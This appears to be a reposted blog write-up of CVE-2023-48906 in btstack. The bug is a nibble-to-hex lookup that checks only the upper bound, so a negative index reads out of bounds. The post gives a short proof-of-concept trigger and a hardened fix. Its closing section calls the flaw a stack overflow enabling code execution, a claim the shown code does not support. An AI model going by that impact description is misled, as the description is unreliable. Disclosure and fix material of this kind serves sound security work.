
CVE-2023-48906

Posted: 2024-03-13 13:55:05  Views: 32
Tags: typedef include return int nibble char 2023 CVE 48906

GitHub: https://github.com/bluekitchen/btstack/issues/546

In the btstack source code, we can find an interesting piece of code.

char char_for_nibble(int nibble){

    static const char * char_to_nibble = "0123456789ABCDEF";

    if (nibble < 16){
        return char_to_nibble[nibble];
    } else {
        return '?';
    }
}

static inline char char_for_high_nibble(int value){
    return char_for_nibble((value >> 4) & 0x0f);
}

static inline char char_for_low_nibble(int value){
    return char_for_nibble(value & 0x0f);
}

All three functions take a signed int. The only range check in "char_for_nibble" is the upper bound "nibble < 16", so a negative "nibble" passes the check and the if statement does not behave as intended.

    if (nibble < 16){
        return char_to_nibble[nibble];
    } else {
        return '?';
    }

As a result, a negative nibble indexes memory outside the char_to_nibble array, an out-of-bounds read; the post describes this as a stack overflow.
Here is the PoC code.

#include <stdint.h>
#include <stdio.h>

typedef int8_t  i8;
typedef int32_t i32;

/* Vulnerable function as it appears in btstack: only an upper bound is checked. */
char char_for_nibble(int nibble){
    static const char * char_to_nibble = "0123456789ABCDEF";
    if (nibble < 16){
        return char_to_nibble[nibble];
    } else {
        return '?';
    }
}

int main(void) {
    i32 v0 = -2147483643;        // negative nibble: satisfies "nibble < 16"
    i8 v1 = char_for_nibble(v0); // $target: reads char_to_nibble[v0], far outside the array
    printf("%d\n", v1);
    return 0;
}
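As an added example (not btstack's own code or fix), here is a hardened char_for_nibble with a two-sided bounds check, an equivalent unsigned-cast variant, and the nibble helpers used by a small hex encoder run over a constructed 6-byte address; the function names, hex_encode and the sample bytes are assumptions made for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hardened lookup: reject every index outside 0..15, including negatives. */
char char_for_nibble_fixed(int nibble){
    static const char * char_to_nibble = "0123456789ABCDEF";
    if (nibble >= 0 && nibble < 16){
        return char_to_nibble[nibble];
    }
    return '?';
}

/* Same effect with one comparison: cast to unsigned so a negative nibble
   becomes a large value that fails the upper-bound check. */
char char_for_nibble_unsigned(int nibble){
    static const char * char_to_nibble = "0123456789ABCDEF";
    unsigned int idx = (unsigned int) nibble;
    return idx < 16u ? char_to_nibble[idx] : '?';
}

static inline char char_for_high_nibble(int value){
    return char_for_nibble_fixed((value >> 4) & 0x0f);
}

static inline char char_for_low_nibble(int value){
    return char_for_nibble_fixed(value & 0x0f);
}

/* Hex-encode len bytes into out (needs 2*len+1 bytes); returns chars written. */
size_t hex_encode(const uint8_t *buf, size_t len, char *out){
    for (size_t i = 0; i < len; i++){
        out[2*i]     = char_for_high_nibble(buf[i]);
        out[2*i + 1] = char_for_low_nibble(buf[i]);
    }
    out[2*len] = '\0';
    return 2*len;
}

int main(void){
    /* constructed sample: a 6-byte Bluetooth-style address */
    const uint8_t addr[6] = {0x00, 0x1A, 0x7D, 0xDA, 0x71, 0x13};
    char hex[13];
    hex_encode(addr, sizeof addr, hex);
    printf("%s\n", hex);
    /* the PoC value and an out-of-range positive both map to '?' now */
    printf("%c %c\n", char_for_nibble_fixed(-2147483643), char_for_nibble_fixed(16));
    return 0;
}
```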

The hazards of stack overflow include the following aspects:

Code Execution Control: A local stack overflow vulnerability can allow an attacker to manipulate the program's execution flow by carefully crafting malicious input. By overflowing the stack and overwriting critical control data, such as function return addresses, an attacker can gain control over the program's execution. This control can be used to redirect the program's flow to malicious code, enabling unauthorized operations and exploitation of other security vulnerabilities.

Denial of Service (DoS): Stack overflow vulnerabilities can also lead to denial of service attacks, causing the target system to crash or become unresponsive. By sending specific malicious input, an attacker can trigger a stack overflow, causing the program to crash or enter an infinite loop, depleting system resources and rendering the system unresponsive.

From: https://www.cnblogs.com/focu5/p/18070469
